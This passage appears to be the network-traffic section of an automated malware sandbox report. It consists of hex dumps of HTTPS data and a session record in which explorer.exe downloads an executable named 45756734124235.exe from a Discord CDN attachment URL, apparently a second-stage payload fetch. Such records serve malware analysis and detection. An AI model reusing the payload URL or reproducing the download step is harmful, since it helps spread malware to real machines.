                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2919INData Raw: b8 1b 74 17 f9 7f 21 a0 c7 e9 74 f2 3b 2f 6e 07 f1 89 07 a9 fc 18 8c 02 ac e0 ba 01 ca 59 f5 45 33 a4 d1 a5 c7 0a 25 cd 6e 05 e9 9f 41 c2 c3 6f 75 1c b5 3f d8 f2 c4 ea e2 6c 05 18 38 86 39 cd af c0 ff cf 62 8e f2 20 ec f7 16 31 41 fe 71 7e 17 a2 82 14 e6 51 ba 4d 5d a4 e7 22 eb c0 ad 0b e5 2b 5b a2 a8 3d b7 60 ad 5c de 63 bf 70 83 24 0f b9 aa 26 c7 30 10 e7 a3 36 4b 06 fe 12 38 f7 19 97 a2 73 4e bb 9b de 20 83 4f 51 81 72 38 43 24 99 f0 4a 5e 99 5a 3b 2e 26 25 55 e8 9c 17 72 25 94 66 f2 cb 09 bd 97 dc 47 de 51 e1 52 53 bb c4 93 17 5a 14 f9 84 da 3e dd 7b 51 fa 5d 51 89 d8 53 bb 84 97 09 e3 d5 cf 73 25 d0 20 bf 74 d9 5c 87 5d 20 d3 09 f6 92 ff 3d 83 23 f2 f3 4e 0f bf 2d c8 6d 69 85 2f 60 ee 25 64 ab f5 3c 40 c0 62 4b 5c 5f 3b a8 5a 01 40 2d e0 68 19 5e 3e
                                                                                                                                                                                                  Data Ascii: t!t;/nYE3%nAou?l89b 1Aq~QM]"+[=`\cp$&06K8sN OQr8C$J^Z;.&%Ur%fGQRSZ>{Q]QSs% t\] =#N-mi/`%d<@bK\_;Z@-h^>
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2935INData Raw: bd 2f f4 17 9a fe cb 33 d7 df 31 5b fc 08 ac 53 a8 a0 96 3a 25 60 11 1e 7e 0f e9 88 73 e3 a0 be 8c d5 c4 b2 50 22 fe c8 f7 20 74 ec 5e 1a a2 e0 cb a4 77 94 9f 43 9a 10 36 ef 4a e6 40 02 bf 80 68 bd ec 10 70 1c d2 60 09 6b ce 63 1c ce 3d 90 6b 00 30 06 21 3d 27 1d b7 89 b7 4f c0 8e 80 1c 11 17 48 e0 8d 26 8c 8c 20 d3 64 47 02 9e 14 28 42 2b 01 5d f3 94 89 e8 36 90 df a8 e9 01 ac 07 6a d8 0d c3 4b d8 88 b9 3c 56 2d 0b 05 48 c5 d9 4a e1 4a dc 01 0d 89 14 2b 03 b2 1c 75 a2 76 b6 3d 12 65 9f 42 28 a7 76 da 89 a3 ee fd 19 32 04 64 59 88 a9 a8 7b 64 59 8c 5e 40 cd 7c 2b ea 06 a6 28 e7 28 00 c1 e6 97 e4 99 81 21 af e6 2c 00 7d 1c d9 dc 08 ab 17 02 c7 83 fe 9c 92 6b 99 8f 09 09 50 b1 23 b8 7b 17 8e a7 7c 52 6f a5 f1 b2 6a f8 98 bd 2b b9 63 09 f3 30 4b 5c 7b 4b 5c
                                                                                                                                                                                                  Data Ascii: /31[S:%`~sP" t^wC6J@hp`kc=k0!='OH& dG(B+]6jK<V-HJJ+uv=eB(v2dY{dY^@|+((!,}kP#{|Roj+c0K\{K\
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2951INData Raw: 67 0e fd ff 30 1d 9f 56 f9 4c 5a c0 15 41 47 3f 73 bf 05 4d 86 da 93 82 eb e0 a5 eb 0f 62 8a 72 47 0c 34 93 c2 1c 97 e1 2b 41 07 42 15 ff c1 3a 9c 16 11 42 01 16 4e 49 21 0c e0 ff 2a eb 21 8c 54 15 00 d7 7a 14 50 ee 6b e2 18 75 7f dd 87 1e 62 00 9a d3 7b df da fc 9f 4f cf 52 66 53 81 da b6 91 3f e8 9a 2c 28 2c 62 3b 41 01 70 e2 d2 31 e7 3b be 3c 12 e8 7f fc 86 f2 e9 7e 38 b1 56 03 1f ed 2f e2 f6 0e 78 2a 31 a3 49 21 56 9d f4 9a 46 00 31 eb 4d 6f ae fd 5d 26 18 0d be d4 58 0a 96 01 a0 75 0e ef ba 08 16 80 85 40 2b 6c ec 79 a5 25 4b 9d d4 62 60 f7 01 86 11 29 aa 3e b2 08 ab c6 02 25 45 94 2e 75 05 45 b3 cc c0 e7 01 81 38 2c 18 e2 f3 68 2e 85 64 88 c0 d3 81 d7 50 18 fd f3 09 02 d2 59 c3 73 9a c4 df 99 c4 45 00 a3 0f 56 59 fa 04 13 64 7b 01 f8 0a 1b 94 2a 6a
                                                                                                                                                                                                  Data Ascii: g0VLZAG?sMbrG4+AB:BNI!*!TzPkub{ORfS?,(,b;Ap1;<~8V/x*1I!VF1Mo]&Xu@+ly%Kb`)>%E.uE8,h.dPYsEVYd{*j
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2967INData Raw: 8a 20 d8 a8 60 d4 92 09 c6 90 4e 96 00 43 f6 1a ca e5 14 d5 65 b4 2d e5 6e 90 bc b2 53 74 7d 60 56 68 1f 69 70 4b 4f 5e dd 91 2a b2 5d 96 ae dd ca 7e f2 e3 d3 40 a5 55 68 be 0c 75 06 7f 5d 81 ed ba 0f 4c 2d 23 02 5f 7e 01 e8 05 84 07 5d ab b2 e7 97 bd 9f ad 3b e2 d1 a4 ee 2b 6e 6c c9 f4 9b 00 22 a6 74 81 e3 d7 ed ef 58 2f ab 07 7e 2c 85 78 c0 eb 0d 4d 2b 58 9d d6 69 40 d4 55 53 4e d4 ef 9e 32 4a ee ca 4c c0 7c 2f e4 ff e0 4b 57 bf 28 14 22 fa fe 9f d9 a5 4f a0 1e be 2a 25 0a e2 ae 00 e0 71 9e 2f 91 40 df af 9f c0 62 c8 01 95 77 a9 4c 00 5a 47 8b ba b5 c4 6c 73 0d bd e2 f1 f9 27 69 de 1a 7a 76 50 5f c2 b2 5f 72 d4 21 b2 12 00 e3 e7 16 a5 8b 8c e1 3e bd 90 c4 9e 53 22 16 2f 60 5a ec 2c 5c bc 4b 85 f8 0c a2 be 18 50 8c 82 d5 3e c0 28 fe bf 9c 38 83 a4 0b db
                                                                                                                                                                                                  Data Ascii: `NCe-nSt}`VhipKO^*]~@Uhu]L-#_~];+nl"tX/~,xM+Xi@USN2JL|/KW("O*%q/@bwLZGls'izvP__r!>S"/`Z,\KP>(8
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2983INData Raw: 0d 09 a6 d4 73 1f 15 13 6c 53 a3 b4 76 86 40 49 c7 3f 43 e5 0c 0d 23 2f 1a 52 b5 94 95 21 fa 45 0a 95 ef ae 2f 5d 1c df 24 c1 a2 00 27 22 f3 e5 6b 64 10 00 c5 ed 39 07 56 d6 b5 8d cf 48 c8 80 d4 1b 2c ba 95 01 9c 2d fb 11 1f 18 fc d8 77 ac 5c 54 3d 92 00 8b b8 1e 91 ee 43 7b a8 c0 19 81 fe 85 9e 82 92 ba 28 c7 34 c4 04 36 a3 56 84 18 bf 81 8e 9f d5 01 b2 13 8c 9c 76 9a 5c 2b 17 7f c6 29 aa d8 a8 7b 5f da d1 43 c4 b0 2f aa 07 b1 59 76 c8 b1 28 1f 49 04 fa dc ed 15 70 63 86 30 c7 cf b4 34 a3 b0 31 f0 0c 28 85 8b 51 aa 1b 13 33 42 84 4d b5 79 2b be 68 69 a5 56 c7 1e 8e b6 f0 13 49 f6 22 30 12 d5 81 cd 1b a5 15 f2 11 5c 68 51 01 ed 18 b0 17 f2 4a 48 fe 20 1e 4c be d4 05 7d 4d 72 40 ee a9 48 58 cb e2 a1 14 2f 2b 0f d0 8f 68 fe 00 a5 2b a1 bd 8c a8 14 fb 37 f1
                                                                                                                                                                                                  Data Ascii: slSv@I?C#/R!E/]$'"kd9VH,-w\T=C{(46Vv\+){_C/Yv(Ipc041(Q3BMy+hiVI"0\hQJH L}Mr@HX/+h+7
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2999INData Raw: 09 69 10 76 38 5f 41 74 53 2b ee 21 18 df 5b 3f cb 1a 02 68 7f 60 0b 16 7c 02 cd 22 f8 b9 ce 5e 48 76 0c 63 9d 7d 1d 24 12 0c ef cf dc 10 56 be 98 18 69 ae 0f 7e 59 29 f7 0a ef 08 12 5e fb 8b 36 96 ca 5d 4e ee 75 f7 ab 2f fc 4a cb 5e 96 bd e4 e0 51 b9 d7 00 93 bb 2f 81 c1 2d 6c 44 5f d0 e8 87 f3 8b 94 b9 9e 90 e6 00 f7 de 3b 1b 81 eb 86 00 4c ba 6d c1 e3 04 51 68 0a be d7 d9 2b 9c 1c cb d8 4b 28 92 fb 3b d6 5f 02 f3 bb 53 68 4c d7 47 bb 00 57 4e e3 ff 64 8f 5b 05 88 27 ea 40 3e 83 29 81 b8 a1 3e 17 08 f3 09 5a 22 d1 b7 44 2d 35 98 b3 b9 41 ec 20 79 4c 01 58 c8 c0 83 de 41 1b 00 b7 b8 ed 32 b9 70 2e 3c 70 a0 34 09 a3 b0 d0 dc 85 66 e1 8a df e7 7b 0e b2 6c 13 af a6 b3 b0 d8 8e fe 95 d4 ec f8 e9 80 49 73 e8 10 c7 6d 28 b9 76 fe 46 95 00 cc de 4b 08 ea d0 cb
                                                                                                                                                                                                  Data Ascii: iv8_AtS+![?h`|"^Hvc}$Vi~Y)^6]Nu/J^Q/-lD_;LmQh+K(;_ShLGWNd['@>)>Z"D-5A yLXA2p.<p4f{lIsm(vFK
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3015INData Raw: 24 86 44 cf 1c e9 42 42 b0 79 3c 29 05 cc 60 c2 ca 0d b4 7e 20 07 d6 26 0b c4 82 12 1c bf e3 72 1c f4 24 21 83 d3 13 86 37 04 90 17 82 bc ec fa fc a8 8f e2 b0 03 92 01 9f a5 f7 c1 a1 9a 6a 40 5a 8c 52 31 82 ec 01 7f 09 a3 8a 5f 47 21 7a 40 0f d1 45 9a 66 4b 88 4a 60 0e dc cb b2 91 c0 f5 6d a0 ca 0f 59 56 26 7a 2f 95 ce 63 33 d8 e5 44 1a 9f 49 70 7f d8 89 13 09 b2 42 90 a1 d2 82 e4 da b4 f8 a5 fd 6f be 0c 0f df 38 59 00 61 21 cd 25 bf 33 8a d3 b5 94 b4 43 8f 2f 6a e1 14 cc 7f 17 10 fd 04 c4 3c 36 ab ec fe a0 30 15 28 4a 91 e3 dd c6 7a 81 38 95 68 dd 04 18 ea 45 68 d6 b6 d0 13 51 ff 31 60 a9 70 02 0c ce 02 44 c3 84 5a ba f4 b0 3f 01 af fd f4 cf 21 9a 0f 3f bc 4e a1 4c 43 c2 ff e5 3a 00 ae 81 a3 21 22 f6 03 14 57 63 76 79 4a 09 64 b4 8a fd 63 2a d3 39 0a 8c
                                                                                                                                                                                                  Data Ascii: $DBBy<)`~ &r$!7j@ZR1_G!z@EfKJ`mYV&z/c3DIpBo8Ya!%3C/j<60(Jz8hEhQ1`pDZ?!?NLC:!"WcvyJdc*9
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3031INData Raw: 4e 52 be 29 8c 26 37 13 55 57 20 12 f5 d9 47 e0 59 b7 5e 59 d0 68 7d 13 2d 01 54 20 26 38 bf d2 46 51 4e 88 13 68 09 1a fa 3d 06 d5 f3 36 82 64 8f a8 25 75 f1 89 e2 51 57 5f 96 1c bd d4 9d d2 5d f1 06 69 df 79 57 d2 77 ef 8b 20 9f bf 65 6d 49 7e 39 5a df b4 26 83 d5 b7 08 a7 75 66 cc 09 e9 88 72 e2 a3 3a ce 6a af 61 b9 bb 56 6a 05 60 c3 8b ec 26 07 de ba 30 0e d9 91 36 4c 2b c0 14 fd 5a dc 74 7b 97 f6 7a e3 04 2e 0b 18 29 4d ed 0c 62 11 4c 18 3a 89 ae 78 eb 50 95 d9 fc a5 68 a4 d6 56 c5 3d 53 be bf a0 06 d1 00 a7 a9 43 ed 1f 58 42 a3 9e 10 9c c0 cf 02 f8 e2 8b 8d f2 f2 bc 3d 1f 04 03 62 78 23 10 b4 1c c1 d7 43 40 a4 8e 56 f4 25 2a 0e e5 29 a2 e3 27 6e 20 12 5b f0 c7 d2 0b 8e 6b ff 15 a0 a1 1e 41 ed 77 ff 1b 10 27 d6 40 8c 30 bd 80 0c 19 01 21 b7 cf 14 24
                                                                                                                                                                                                  Data Ascii: NR)&7UW GY^Yh}-T &8FQNh=6d%uQW_]iyWw emI~9Z&ufr:jaVj`&06L+Zt{z.)MbL:xPhV=SCXB=bx#C@V%*)'n [kAw'@0!$
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3047INData Raw: 00 fe 94 3c a5 3e 16 64 6d 3f b1 6c 00 7c cd 53 ed 31 85 1f 60 3d 08 5d e3 1e c7 00 9f 0a 44 58 4c ad 72 a5 00 cb 16 a2 6a ed 8c 28 2a 00 e0 13 cc f8 8a f1 0d 43 09 09 b0 52 f0 00 96 fb 26 6b 77 00 a3 2a 7f ac 15 ee 63 3e 3c f5 d4 00 5c dd e6 72 d9 40 e9 00 ad 71 0a e0 36 99 67 c8 00 8d cc 54 63 bb df 89 b3 00 f8 b6 88 cf 06 62 b1 d7 ea d5 78 9e 00 91 13 15 94 12 f1 28 49 00 71 c1 f9 55 dc 4d 85 c0 01 8d 3a a6 be 41 e1 21 f4 94 42 00 c4 8c 98 f8 eb 01 2c d6 00 13 47 1c 2d bf bb 57 5c 07 3c b1 3b 07 97 37 16 80 c0 83 a4 ca 79 92 0e 6d c7 f0 b3 ea f2 cd 00 f5 dd 44 24 e0 b7 3d 88 ae 1d cb 1e c0 21 66 f3 6e 03 77 1c 91 8c 85 40 fd 9e fe f9 98 a2 e2 3b 00 ae 8d c6 55 b2 f0 44 29 07 35 7c 3a 59 7d 40 3f 5d ac 28 00 ba 04 f5 e3 0b 2b 87 71 1c 1d 7a a8 80 90 85
                                                                                                                                                                                                  Data Ascii: <>dm?l|S1`=]DXLrj(*CR&kw*c><\r@q6gTcbx(IqUM:A!B,G-W\<;7ymD$=!fnw@;UD)5|:Y}@?](+qz
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3063INData Raw: d2 24 1c 9e 6d 5f 3a 00 ae 0c 58 26 40 dd 8c 00 ba ed 11 30 5c 9f 63 66 00 ef 2c 69 bf 31 6e 2a 80 00 f8 7b 98 2b 87 13 49 24 00 68 0a 84 35 7a 59 da 30 00 cb eb cf a4 04 e8 57 7e 1f 13 55 cd 83 27 72 4d 50 e8 9a b8 c7 e4 24 00 26 a2 17 a9 f4 c8 af 0b 01 0f b1 0a 52 9c e5 a5 d4 87 02 00 09 5c ae 83 56 ad d7 c0 00 f0 b4 de 48 ba 06 41 0d 00 a6 81 80 e9 cc b0 c3 31 00 c5 64 8a 8c eb 5b 9a 54 00 1a 78 63 ad e3 2e 68 ae 1d a6 b0 e5 c0 05 7d 79 08 ef 23 71 e7 00 8e d2 b7 42 d4 95 9d dc fb 7f b1 05 34 d3 c5 79 e0 28 0f ee 09 48 cf 24 00 14 85 86 e3 70 2a c6 00 11 93 ce 48 b0 51 7a 4a 00 a4 71 df 07 3b 64 2b 4c 00 41 09 da 1b d2 a9 5f 9e 00 5e 89 80 fe eb 72 5b 0c 39 df d8 00 2f 5a c7 97 52 45 be 90 c5 03 c0 d5 47 6a 42 a8 d8 1f f7 14 0f a5 19 85 10 a0 d3 f4 e7
                                                                                                                                                                                                  Data Ascii: $m_:X&@0\cf,i1n*{+I$h5zY0W~U'rMP$&R\VHA1d[Txc.h}y#qB4y(H$p*HQzJq;d+LA_^r[9/ZREGjB
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3079INData Raw: 70 93 e5 4c 38 c0 0c 3a c7 72 af 2e f7 94 64 38 54 a1 70 81 20 10 f9 18 b6 01 8a db fe 8e dc 95 45 d0 52 50 00 cc 73 15 8d 32 df 1a 8b 3c a3 08 00 ba 60 d5 05 70 95 6b 00 a2 a9 cb 64 23 45 cd 35 00 8b ba f3 6d ef 46 ec 4a f8 8e 00 07 20 6b 1b eb b3 25 d1 00 9c 5b 77 27 24 a7 83 15 03 cb 1e 95 18 78 ad f4 c0 d0 0c e2 6c 00 16 e6 6d f9 e3 af c2 d1 01 08 da 59 6a 11 3f 95 d4 3a d8 12 ee c9 fb 00 3b 34 89 97 dc d1 00 f6 dd 96 af c5 70 bf 93 01 1c 6a 24 e8 a0 c1 50 d9 33 30 e1 e2 0e 2c 1f 8e 70 c0 c0 4d 66 36 cf 00 fe 5e e5 a3 3a 3f ac 3b 0e e4 de 46 b1 ee 50 80 03 67 53 cd f0 00 dc f4 82 23 0a 8d 87 35 00 e4 9e a5 78 19 2a 16 85 00 ad 04 0b 1d ac 31 83 bf 03 33 70 b0 80 6d d9 a8 62 98 9a 7a 43 07 2f bd 61 53 7c e0 08 51 87 8e 01 28 d7 f6 e9 6a ab a0 f8 42 dd
                                                                                                                                                                                                  Data Ascii: pL8:r.d8Tp ERPs2<`pkd#E5mFJ k%[w'$xlmYj?:;4pj$P30,pMf6^:?;FPgS#5x*13pmbzC/aS|Q(jB
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3095INData Raw: 78 b8 eb 00 64 9d 98 e0 e2 e8 ad 4e fa d0 3b df 96 03 51 ce a1 c2 82 90 6a 27 99 00 d6 45 7e f8 59 83 d0 33 0e 12 9c 0f d1 45 08 14 f8 49 20 ca 02 2a e3 16 f5 e5 ae d7 22 17 ad 8b 07 e4 70 ce db 42 58 75 1e 01 6b e8 0c bd c7 6f 1c d0 d8 33 00 29 76 64 71 67 b7 93 19 3a 16 0b 80 c0 ef 2c 34 35 1f c7 1c c2 1c 47 dc 76 c0 58 4d 4c 3c f3 ad 00 af f7 89 c4 90 21 b1 a1 1e 0d 3a 97 40 43 9f 68 1e 38 39 e8 1b 04 9c c3 eb b5 2c 80 b8 30 74 37 00 66 ec 77 56 dd d9 f0 83 1c e8 90 42 92 62 00 f4 8e 0f 64 4a c4 02 9f 76 65 45 86 bf 61 81 4c df df 70 df 05 2a 99 00 50 4e 14 af b1 b5 3c 8c 00 a4 0b 3a fd 35 be 81 ef 0b ea 99 d5 4f 00 22 1f 31 f9 b2 03 53 63 90 76 8d cb c0 7f c6 1d 00 32 2a aa f3 72 18 30 0a 00 8e 97 2b d2 87 52 40 62 58 b2 63 00 83 ed c1 5a 72 6d 74 00
                                                                                                                                                                                                  Data Ascii: xdN;Qj'E~Y3EI *"pBXuko3)vdqg:,45GvXML<!:@Ch89,0t7fwVBbdJveEaLp*PN<:5O"1Scv2*r0+R@bXcZrmt
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3111INData Raw: e9 d7 fc 07 6f 6a 87 80 12 d0 5c c1 77 e4 00 3c 2d a7 1d e2 63 6f 32 00 7b ec 44 28 9e f5 c0 69 00 4e ea d6 31 52 d9 04 98 00 9a b8 70 19 16 eb 08 13 03 ca a4 ae e3 ef 4b d0 2f d6 d9 00 9c 20 45 e2 05 18 25 4e 09 93 c7 55 26 00 02 f1 fa 6f b3 0e 43 60 a7 38 3d 40 8b c2 55 36 2e 6b 07 dc 2d ee 5e 78 85 7e c7 71 f3 03 0c a8 30 a3 73 72 06 70 d3 13 c2 02 25 07 3e 4e 59 50 3f 75 7c b0 00 e5 f9 ce c9 8f 65 3a c6 1d 9e 03 39 40 95 6d f6 bf 69 20 00 60 92 02 d6 26 a7 35 11 fc b0 7d 27 3f 5c 36 00 20 bf 83 6d c5 61 32 00 d8 68 bd ee 76 f5 86 d1 01 a7 78 b2 b5 45 5d 16 cc 36 1e 00 46 6b a3 11 42 4e 41 55 1d b4 d0 28 80 02 1f 7d a7 fe b5 00 7f 49 68 c5 30 f9 91 77 fa e8 1f 87 38 8b c1 5b cf aa 26 79 c0 56 9b 00 30 e4 97 f5 0d 78 89 e8 07 82 d1 58 9f c6 b0 ab 05 5a
                                                                                                                                                                                                  Data Ascii: oj\w<-co2{D(iN1RpK/ E%NU&oC`8=@U6.k-^x~q0srp%>NYP?u|e:9@mi `&5}'?\6 ma2hvxE]6FkBNAU(}Ih0w8[&yV0xXZ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3127INData Raw: fc ff 93 aa a2 a1 84 85 23 01 7c ff 6c fd c6 dd 30 0d 9b b1 80 a0 cd 80 57 8c 25 ee c7 d2 a8 30 8f fb 20 09 a3 0b 64 99 14 96 90 a5 d5 c4 6d 38 4b 18 ad 47 11 a8 a8 17 9e b7 e9 d9 0c 2e 79 39 a1 be 10 22 5a 37 62 28 bf a7 5d f1 79 00 08 18 e9 21 e5 73 7d f9 32 85 76 28 b7 29 01 5b 8d 20 2e 5d 78 3e ac 4e 8b ce 23 46 bb 22 d8 53 bd 1d 00 09 6e 7f fa 1f 38 83 61 02 e8 fc a2 aa c3 0e c0 e2 45 4a ee 18 00 23 2d fe b4 10 11 f9 b1 00 d4 1d 39 12 c0 0c 95 5a 3b 98 49 80 7e e5 b0 b8 14 38 cb 98 45 38 0d e4 80 51 5b a2 70 ac b4 d7 03 c5 d4 8a ed 59 78 90 fd 10 e6 00 5c 51 12 a5 40 04 bc 92 00 53 45 37 18 d8 4c 34 17 03 7e 6a 0f 0b b5 94 c0 cd bf 1e 00 2f 95 74 87 46 ef 6e 6c 00 f7 ba 92 1b 55 b4 86 a1 00 bf bd 74 e2 b2 97 1c 2c 1d ac 47 61 c1 2a 59 8b 28 84 dc 6b
                                                                                                                                                                                                  Data Ascii: #|l0W%0 dm8KG.y9"Z7b(]y!s}2v()[ .]x>N#F"Sn8aEJ#-9Z;I~8E8Q[pYx\Q@SE7L4~j/tFnlUt,Ga*Y(k
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3143INData Raw: e0 7e 60 00 77 d4 27 4a 04 84 9a fe 16 68 de f5 01 6c 9c 43 9d 24 3b f0 30 7a 45 b3 c1 67 f3 25 14 c9 dc 7d 00 26 fc 21 77 43 42 00 24 07 3b 35 66 3d b8 62 3f d2 76 a7 ab e9 2c 44 10 f5 18 19 67 86 40 4a c0 e2 77 c2 f2 7c e3 5e 35 fc ed 84 fe 6a 06 94 cc 14 0c 1a 8d 88 fd 38 57 f4 c2 7a c5 60 fa 61 d5 7e 9f 15 1b f7 12 63 30 b8 41 8d 35 33 9e 09 24 22 ce bc 2c 20 7b 52 cb d5 a4 bf 12 fc 8f 5e ad bf 18 28 6b 28 f7 45 9d 06 ca f3 58 37 58 01 28 73 02 1d e8 53 73 10 39 43 40 80 d3 dc b1 86 0f 50 c4 c2 8c bc 65 66 64 a6 32 b9 32 5c 68 c8 de 3b a3 03 3f 08 e9 ca 7b c0 d7 53 e3 ba 7a 2c 18 bb 43 de 14 6d 79 c0 30 5e 80 0f 82 f6 31 fc d4 1a ef 6f bd 2e 94 83 eb 0b 10 14 e6 25 b4 ff b9 3d 5e 2f 32 12 3b 80 a8 20 96 69 9d b0 8d c0 2c cd 40 2c f8 e0 17 2f ec 2b 0b
                                                                                                                                                                                                  Data Ascii: ~`w'JhlC$;0zEg%}&!wCB$;5f=b?v,Dg@Jw|^5j8Wz`a~c0A53$", {R^(k(EX7X(sSs9C@Pefd22\h;?{Sz,Cmy0^1o.%=^/2; i,@,/+
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3159INData Raw: 59 88 2c f1 f4 00 a3 cf 35 71 31 db 94 89 ee aa 00 51 a9 05 6f c4 f6 a1 ac 00 dd c8 37 1b 9a 5c ab 35 07 e6 59 71 ce 29 32 62 66 5d 40 f0 53 fe 01 ff d5 02 a0 d0 90 b7 6f 91 d7 db e4 3b 44 d4 c1 4e fb 90 76 c4 3c 90 06 a1 a3 1e f0 c5 24 12 e7 72 e2 bb 28 a4 b4 ed 03 40 81 99 78 03 80 fa b5 60 90 a7 70 02 18 7c 0d a8 c9 31 c0 64 20 7f 00 80 57 a2 be 40 d7 bd e0 f8 cc 3f ef 90 80 42 3f 65 0c 8d 4a 54 16 55 ae 21 bb cd 39 e5 d6 c4 d8 1b 84 e1 b8 a5 00 cc 1c ce 5d d1 de f5 5c fd 68 00 94 51 38 88 1f b8 65 00 3b 9c 5c 3c a7 4a 3f ca 00 e4 a1 b6 3d f5 c8 5a 43 00 a9 89 8b 1b 47 c5 9a ef 00 66 68 cf 6f 94 eb 67 f0 00 1a a9 87 15 32 5c ec 72 3e a4 f5 80 2b 90 42 46 0b f8 ac 00 08 01 82 5d 3d 04 27 9d 00 f9 2c b0 f6 14 1a c8 c2 00 05 8c 85 dc a0 45 92 58 00 f0 9a
                                                                                                                                                                                                  Data Ascii: Y,5q1Qo7\5Yq)2bf]@So;DNv<$r(@x`p|1d W@?B?eJTU!9]\hQ8e;\<J?=ZCGfhog2\r>+BF]=',EX
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3175INData Raw: 2c c9 91 2a 00 2e de 51 04 ad 27 92 06 2e ed ca 9f 25 94 74 43 47 13 54 65 00 35 01 3e ad 84 79 01 cd f3 e4 8a 32 28 90 d4 d1 36 00 61 97 fb d3 fa 25 8e e9 02 12 06 a2 b9 89 ce 41 1f 7f 40 9c aa a8 92 01 4d 22 d8 8e 1e 28 a0 31 04 f8 7b 98 00 da fd 02 5a 3e e2 4e 0e 00 10 62 49 a6 7f 1d de d2 0b 16 79 c2 5a 00 aa be 95 85 8f ee 04 00 a1 40 a0 30 0b 7b fd 2c 07 5e 47 20 09 1d f0 16 76 23 54 00 c5 d8 db 6d b2 ae 44 96 00 84 91 de df 78 f9 14 01 00 0c 8f 30 ea a8 61 aa f6 00 e2 6e 7d cf fa 7c ae 98 00 40 d9 f8 da a9 08 3a 15 03 d7 18 7a 3f 73 b0 1c fe 85 f6 00 28 53 27 82 99 4a a2 db 80 ca a4 71 c0 b1 00 56 36 6d 7e 84 a5 6b d8 00 aa cc 3e d6 1f 82 c1 27 03 4c a1 8a 98 11 e8 c8 3a cf bb 07 29 73 86 a5 45 a4 b7 c0 d8 0a 02 83 00 25 56 d9 15 b3 78 46 c7 00 a4
                                                                                                                                                                                                  Data Ascii: ,*.Q'.%tCGTe5>y2(6a%A@M"(1{Z>NbIyZ@0{,^G v#TmDx0an}|@:z?s(S'JqV6m~k>'L:)sE%VxF
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3191INData Raw: 0d 00 3d f7 67 98 68 b2 f8 8c 00 9f 4d c1 13 e2 a8 c5 23 1c 39 c6 dc 17 22 00 19 d5 46 01 6a ba 00 6d 21 c7 42 b9 b7 85 d9 7a e1 00 31 87 ca b3 b0 5f 03 2f fc c8 00 a8 a4 16 4b 72 b8 36 32 3a ef bb 00 48 f9 e7 02 35 1c 5f 1e 95 6b 55 00 1a a6 4e b4 0a d1 00 8d 7d 28 58 59 cd 9a 47 1c 1d a5 75 80 26 b5 01 1c c8 a3 00 1b 08 7d 5f 25 dd 17 eb 00 f6 3f 12 d3 85 8e ce 5d 00 ac d4 f2 2a d1 a4 cb 83 05 14 6d e5 d7 0d 0f ff 05 40 94 27 b3 a6 3d 00 68 73 f7 9d 49 b0 9f e7 00 bc 82 f5 af 87 42 ef d6 00 1f 77 9a e2 c1 7e 02 26 04 fc 65 12 7d 2f b8 02 b1 76 52 0b 90 1e a0 e0 c8 fa 8d 91 4f 03 d2 85 7a 05 7e 98 98 7c 5a 1f 55 1c 6d 80 36 65 9c 15 9a b8 00 44 5c a6 46 18 6e 25 ad 02 07 0b 32 bc 47 ea 60 7f 6a ab 00 65 45 15 b5 54 f7 da dc 7d 34 78 bb 00 e3 9c 2a 5f 87
                                                                                                                                                                                                  Data Ascii: =ghM#9"Fjm!Bz1_/Kr62:H5_kUN}(XYGu&}_%?]*m@'=hsIBw~&e}/vROz~|ZUm6eD\Fn%2G`jeET}4x*_
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC3207INData Raw: 19 bf 68 fd 10 29 1d 9a c8 39 80 23 6c 40 b7 b0 03 00 5a 3c 58 7e fe a2 35 6a 02 7d ae d8 ab 06 0f e0 78 92 f1 fa c2 01 5d 7c 28 4b 4d 4a 26 c0 30 d5 f2 21 70 f6 98 61 00 51 0f 8b de b7 b5 f5 88 00 69 1e f4 8e 3d 75 bc c3 00 1a 14 d8 52 d1 72 ae 01 00 db 65 16 ca b0 3f 83 06 00 c4 13 9b 3a 6d c7 9c 78 07 ed ea 0f a2 39 40 c1 de 0a 7c 13 1b 0e fc 07 c7 68 64 d0 66 57 c8 ce f4 16 00 43 1c 6f 0f 0d 48 7e ad 00 c4 4b 60 2d 20 0e 55 83 12 75 6a 72 1e 7d 87 c1 78 a6 d0 d7 16 d1 89 00 f5 29 53 2e cc d6 9c 5e 00 4e c4 01 32 3e de d7 ab 3d 70 c3 f0 00 ef 43 fc 17 8f e2 fb 09 0f 47 4c da 65 ce 50 80 13 41 8c 49 12 00 1b 85 98 ee d7 48 a6 6c 04 c4 db 95 d2 79 ae 00 00 a2 03 42 b0 c6 00 13 cb de c7 96 27 81 ad 00 ab a8 23 5b 86 9b 0d 53 00 33 3f aa 28 e4 1e d5 a4 00
                                                                                                                                                                                                  Data Ascii: h)9#l@Z<X~5j}x]|(KMJ&0!paQi=uRre?:mx9@|hdfWCoH~K`- Uujr}x)S.^N2>=pCGLePAIHlyB'#[S3?(


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  2192.168.2.749804162.159.130.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3222OUTGET /attachments/907388240229716010/909788097527545866/45756734124235.exe HTTP/1.1
                                                                                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3222INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:37 GMT
                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                  Content-Length: 106720
                                                                                                                                                                                                  Connection: close
